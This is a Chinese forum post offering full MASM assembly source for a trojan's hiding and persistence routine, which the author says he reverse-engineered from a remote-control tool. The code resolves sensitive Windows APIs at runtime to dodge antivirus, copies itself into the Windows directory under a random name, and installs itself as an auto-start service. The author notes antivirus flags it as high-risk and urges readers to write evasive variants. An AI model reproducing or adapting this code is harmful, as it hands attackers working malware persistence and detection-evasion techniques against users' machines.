老王教你分析远控木马是怎样工作的

本 来是一个朋友给我，要我找下后门的，可是这远控太强大了，而且作者的汇编基础非常强，就没找到，倒是无巧不成书的，发现了他的隐藏技术，瞬间感觉喜欢上 了，于是写成了win32 分享下，3分钟前，主动防御会拦截，但是电脑重启后  程序可以运行，现在又测试了下，已经变成高危病毒了，无语的360啊。。。源码如下，各位可以根据 需要修改：

[AppleScript] 纯文本查看 复制代码

?

001 002 003 004 005 006 007 008 009 010 011 012 013 014 015 016 017 018 019 020 021 022 023 024 025 026 027 028 029 030 031 032 033 034 035 036 037 038 039 040 041 042 043 044 045 046 047 048 049 050 051 052 053 054 055 056 057 058 059 060 061 062 063 064 065 066 067 068 069 070 071 072 073 074 075 076 077 078 079 080 081 082 083 084 085 086 087 088 089 090 091 092 093 094 095 096 097 098 099 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317

. 386 .model flat , stdcall option casemap : none include windows.inc include user 32. inc includelib user 32. lib include kernel 32. inc includelib kernel 32. lib ; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - 函数名称 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = .const sz 11 db "程序已经在windows目录下了" , 0 sz 22 db "标题" , 0 szUnlockService db "UnlockServiceDatabase" , 0 szExe db "\%c%c%c%c%c%c.exe" , 0 szTest db ".Test1" , 0 szCunMang db ".CunMang1" , 0 szMiaoShu db "BingDuMiaoShu" , 0 szGetModuleFileName db "GetModuleFileNameA" , 0 szGetWindowsDirectory db "GetWindowsDirectoryA" , 0 szCopyFile db "CopyFileA" , 0 szOpenSCM db "OpenSCManagerA" , 0 szCloseServiceHandle db "CloseServiceHandle" , 0 szStartService db "StartServiceA" , 0 szChangeService db "ChangeServiceConfig2A" , 0 szAdvapi 32 db "ADVAPI32.DLL" , 0 szCreateService db "CreateServiceA" , 0 szGetTickCount db "GetTickCount" , 0 szKernel db "kernel32.dll" , 0 szLockService db "LockServiceDatabase" , 0 ; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - 函数地址 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = . data szFileName db 128 dup ( ? ) ;当前路径 szWindowDirect db 128 dup ( ? ) ;windows目录路径 szNullFileName db 128 dup ( ? ) ;windows目录路径，这个加上了exe szMuBiaoName db 128 dup ( ? ) ;清 0 的内存 szTime dd 1 szExeBuffer db 128 dup ( ? ) HandleData dd ? HandleCreateService dd ? szLocalService 1 dd ? addrKernel dd ? addrGetModuleFileName dd ? addrGetWindowsDirectory dd ? addrCopyFile dd ? addrAdv dd ? addrOpenSCM dd ? addrOpenService dd ? addrCreateService dd ? addrCloseServiceHandle dd ? addrLockService dd ? addrUnlockService dd ? addrChangeService dd ? addrStartService dd ? addrGetTickCount dd ? ; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - 代码段 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = .code _SuanFa proc szVar push esi call addrGetTickCount mov esi , eax ;时间的返回值 mov eax , szTime imul eax , eax , 343 FDh add eax , 269 EC 3 h mov szTime , eax ;变量的值改变 sar eax , 10 h and eax , 7 FFFh add eax , 3 h ;eax的值也改变 xor edx , edx ;高位是 0 因为除以的是 32 位数值 imul eax , esi ;esi是原来时间函数的返回值，这里与算法后的eax想乘 div szVar pop esi mov eax , edx ;余数返回给eax ret _SuanFa endp start : ; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = 这是ADVAPI 32. DLL中的敏感函数 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - push offset szAdvapi 32 call LoadLibrary mov addrAdv , eax ;得到ADVAPI 32. dll push offset szOpenSCM push addrAdv call GetProcAddress ;得到OpenSCManager mov addrOpenSCM , eax push offset szCloseServiceHandle push addrAdv call GetProcAddress ;得到CloseService mov addrCloseServiceHandle , eax push offset szStartService push addrAdv call GetProcAddress mov addrStartService , eax ;得到StartService push offset szLockService push addrAdv call GetProcAddress mov addrLockService , eax ;得到LockService push offset szUnlockService push addrAdv call GetProcAddress mov addrUnlockService , eax ;得到UnlockServiceDatabase push offset szChangeService push addrAdv call GetProcAddress mov addrChangeService , eax ;得到ChangeServiceConfig 2 A push offset szCreateService push addrAdv call GetProcAddress mov addrCreateService , eax ;得到CreateService ; - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = 这是kernel 32 中的敏感函数 - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - = - push offset szKernel call GetModuleHandle mov addrKernel , eax ;得到kernel 32 的句柄 push offset szGetModuleFileName push addrKernel call GetProcAddress mov addrGetModuleFileName , eax ;得到GetModuleFile push offset szGetWindowsDirectory push addrKernel call GetProcAddress mov addrGetWindowsDirectory , eax ;得到GetWindowsDirectory push offset szCopyFile push addrKernel call GetProcAddress mov addrCopyFile , eax ;得到CopyFile push offset szGetTickCount push addrKernel call GetProcAddress mov addrGetTickCount , eax ;得到GetTickCount push 128 push offset szFileName push NULL call addrGetModuleFileName ;返回值是名字的长度，名称已经放到了缓冲区 push 128 push offset szWindowDirect call addrGetWindowsDirectory ;得到windoes目录，如果是system 32 则是GetSystemDirectory push 128 push offset szNullFileName call addrGetWindowsDirectory ;再次得到windows目录 mov edi , offset szWindowDirect ;比较字符串中的内容 mov ebx , edi mov ecx , 128 ;比较FFFF FFFF次 mov al , 0 ;比较的字符是 0 cld repne scasb ;当CX = 0 或者 ZF = 1 就退出循环 sub edi , ebx ;此时edi就是字符长度 sub edi , 1 ;减去字符串结尾的 0 mov ecx , edi mov esi , offset szFileName ;源字符串 mov edi , offset szWindowDirect ;目的字符串 s : mov al , [esi] mov bl , [edi] cmp al , bl jnz WindowsName ;如果不在windows目录下，就开始复制到windows下面了 inc esi inc edi loop s jmp _Service ;能走到这一步，代表已经比较完了，字符串肯定相等，就开始服务了 WindowsName : ;如果已经在windows目录下了，就进行设置服务函数 push 1 Ah call _SuanFa mov ecx , 1 Ah push 61 h pop edi add eax , edi push eax ;第一个字符 push 1 Ah call _SuanFa mov ecx , 1 Ah add eax , edi push eax ;第二个字符 push 1 Ah call _SuanFa mov ecx , 1 Ah add eax , edi push eax ;第三个字符 push 1 Ah call _SuanFa mov ecx , 1 Ah add eax , edi push eax ;第四个字符 push 1 Ah call _SuanFa mov ecx , 1 Ah add eax , edi push eax ;第五个字符 push 1 Ah call _SuanFa mov ecx , 1 Ah add eax , edi push eax ;第六个字符 push offset szExe push offset szExeBuffer call wsprintf invoke lstrcat , offset szNullFileName , offset szExeBuffer push TRUE push offset szNullFileName push offset szFileName call addrCopyFile ;开始复制 invoke RtlMoveMemory , offset szFileName , offset szMuBiaoName , 120 ;内存清零 invoke RtlMoveMemory , offset szFileName , offset szNullFileName , 120 ;填充新的路径 invoke MessageBox , NULL , offset szNullFileName , offset szWindowDirect , MB_OK jmp Windows _Service : invoke MessageBox , NULL , offset sz 11 , offset sz 22 , MB_OK Windows : push SC_MANAGER_ALL_ACCESS ;OD中这个显示的是数值F 003 F，那么肯定有朋友要知道我是怎么知道这个宏的，很简单，载入IDA，右键Use Stadard Symbolic.... push NULL ;如果该指针为NULL ，该ServicesActive数据库默认情况下打开。 push NULL ;如果该指针为NULL ，或者如果它指向一个空字符串，函数连接到服务控制管理器在本地计算机上。 call addrOpenSCM ;函数建立了一个连接到服务控制管理器，并打开指定的数据库。 mov HandleData , eax ;如果函数成功，返回值是一个句柄指定的服务控制管理器数据库 mov edi , eax ;先保存起来，因为参数需要eax xor ebx , ebx cmp edi , ebx ;测试返回值 jz _exit mov eax , ebx mov ebx , eax xor ebx , ebx push ebx push ebx push ebx push ebx push ebx push offset szFileName push SERVICE_ERROR_NORMAL push SERVICE_AUTO_START push SERVICE_WIN 32 _OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS push SERVICE_ALL_ACCESS push offset szCunMang push offset szTest push edi call addrCreateService ;创建一个服务对象并且把它加入到服务管理数据库中 mov HandleCreateService , eax ;保存句柄 push edi call addrLockService ;锁定数据库 mov szLocalService 1 , eax push offset szMiaoShu push 1 push 0 call addrChangeService push szLocalService 1 call addrUnlockService push 0 push 0 push 0 call addrStartService _exit : invoke ExitProcess , NULL end start

很简单，没有什么危害性操作，只是弹出个对话框提示下，一天一夜逆出来的，很累，再加上360的捣乱，实在没心情重写了，各位看懂后，就写个变形的吧，唉，喝豆奶粉补充下营养去。。。(只限技术交流)